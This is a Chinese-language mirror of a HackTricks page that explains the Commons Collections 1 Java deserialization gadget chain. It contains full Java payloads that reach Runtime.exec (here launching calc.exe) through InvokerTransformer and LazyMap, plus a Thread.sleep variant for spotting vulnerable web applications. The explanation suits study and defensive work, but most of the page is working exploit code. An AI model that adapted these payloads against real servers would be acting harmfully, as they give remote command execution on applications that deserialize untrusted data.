mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
10 KiB
10 KiB
CommonsCollection1 Payload - Java Transformers to Rutime exec() and Thread Sleep
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一家网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载HackTricks的PDF吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品- The PEASS Family
- 获得官方PEASS和HackTricks周边产品
- 加入💬 Discord群组 或者 telegram群组 或者 关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。
Java Transformers to Rutime exec()
在多个地方,你可以找到一个使用Apache common collections中的transformers的Java反序列化payload,如下所示:
import org.apache.commons.*;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.*;
import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.util.Map;
import java.util.HashMap;
public class CommonsCollections1PayloadOnly {
public static void main(String... args) {
String[] command = {"calc.exe"};
final Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class), //(1)
new InvokerTransformer("getMethod",
new Class[]{ String.class, Class[].class},
new Object[]{"getRuntime", new Class[0]}
), //(2)
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}
), //(3)
new InvokerTransformer("exec",
new Class[]{String.class},
command
) //(4)
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
//Execute gadgets
lazyMap.get("anything");
}
}
如果你对Java反序列化负载一无所知,可能很难弄清楚为什么这段代码会执行计算器。
首先,你需要知道在Java中,Transformer是一个接收类并将其转换为另一个类的东西。
另外,有趣的是,这里执行的负载等同于:
Runtime.getRuntime().exec(new String[]{"calc.exe"});
或者更准确地说,最终将执行的内容是:
((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
如何
那么,第一个负载是如何与那些“简单”的一行命令等效的呢?
首先,你可以注意到负载中创建了一个转换链(数组):
String[] command = {"calc.exe"};
final Transformer[] transformers = new Transformer[]{
//(1) - Get gadget Class (from Runtime class)
new ConstantTransformer(Runtime.class),
//(2) - Call from gadget Class (from Runtime class) the function "getMetod" to obtain "getRuntime"
new InvokerTransformer("getMethod",
new Class[]{ String.class, Class[].class},
new Object[]{"getRuntime", new Class[0]}
),
//(3) - Call from (Runtime) Class.getMethod("getRuntime") to obtain a Runtime oject
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}
),
//(4) - Use the Runtime object to call exec with arbitrary commands
new InvokerTransformer("exec",
new Class[]{String.class},
command
)
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
如果你阅读代码,你会注意到如果你以某种方式链接数组的转换,你就可以执行任意命令。
那么,这些转换是如何链接的呢?
Map map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
lazyMap.get("anything");
在负载的最后一部分,您可以看到创建了一个Map对象。然后,使用该Map对象和链接的transformers从LazyMap中执行decorate函数。从下面的代码中可以看出,这将导致链接的transformers被复制到lazyMap.factory属性中:
protected LazyMap(Map map, Transformer factory) {
super(map);
if (factory == null) {
throw new IllegalArgumentException("Factory must not be null");
}
this.factory = factory;
}
然后执行了最后的壮举:lazyMap.get("anything");
这是get函数的代码:
public Object get(Object key) {
if (map.containsKey(key) == false) {
Object value = factory.transform(key);
map.put(key, value);
return value;
}
return map.get(key);
}
以下是transform函数的代码:
public Object transform(Object obj) throws Exception {
ByteArrayOutputStream byteOut = new ByteArrayOutputStream();
ObjectOutputStream out = new ObjectOutputStream(byteOut);
out.writeObject(obj);
out.close();
ByteArrayInputStream byteIn = new ByteArrayInputStream(byteOut.toByteArray());
ObjectInputStream in = new ObjectInputStream(byteIn);
Object transformedObj = in.readObject();
in.close();
return transformedObj;
}
这是transform函数的代码。
public Object transform(Object object) {
for (int i = 0; i < iTransformers.length; i++) {
object = iTransformers[i].transform(object);
}
return object;
}
所以,请记住,在factory中我们保存了**chainedTransformer,在transform函数中,我们正在遍历所有这些链接的转换器**并逐个执行。有趣的是,每个转换器都使用object作为输入,而object是上一个执行的转换器的输出。因此,所有的转换都被链接在一起执行恶意负载。
总结
最后,由于lazyMap在get方法中管理链接的转换器的方式,就好像我们正在执行以下代码:
Object value = "someting";
value = new ConstantTransformer(Runtime.class).transform(value); //(1)
value = new InvokerTransformer("getMethod",
new Class[]{ String.class, Class[].class},
new Object[]{"getRuntime", null}
).transform(value); //(2)
value = new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}
).transform(value); //(3)
value = new InvokerTransformer("exec",
new Class[]{String.class},
command
).transform(value); //(4)
注意value是每个转换的输入和前一个转换的输出,从而实现一行代码的执行:
((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
请注意,这里解释了用于ComonsCollections1负载的gadgets。但是没有解释这一切是如何开始执行的。你可以在这里看到ysoserial,为了执行这个负载,它使用了一个AnnotationInvocationHandler对象,因为当这个对象被反序列化时,它将调用payload.get()函数,这将执行整个负载。
Java线程休眠
这个负载对于识别Web是否存在漏洞非常有用,因为如果存在漏洞,它将执行一个休眠操作。
import org.apache.commons.*;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.*;
import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.Map;
import java.util.HashMap;
public class CommonsCollections1Sleep {
public static void main(String... args) {
final Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Thread.class),
new InvokerTransformer("getMethod",
new Class[]{
String.class, Class[].class
},
new Object[]{
"sleep", new Class[]{Long.TYPE}
}),
new InvokerTransformer("invoke",
new Class[]{
Object.class, Object[].class
}, new Object[]
{
null, new Object[] {7000L}
}),
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
//Execute gadgets
lazyMap.get("anything");
}
}
更多的Gadgets
你可以在这里找到更多的gadgets:https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一家网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载HackTricks的PDF吗?请查看SUBSCRIPTION PLANS!
- 发现我们的独家NFTs收藏品:The PEASS Family
- 获得官方PEASS和HackTricks的衣物
- 加入💬 Discord群组或电报群组,或者关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。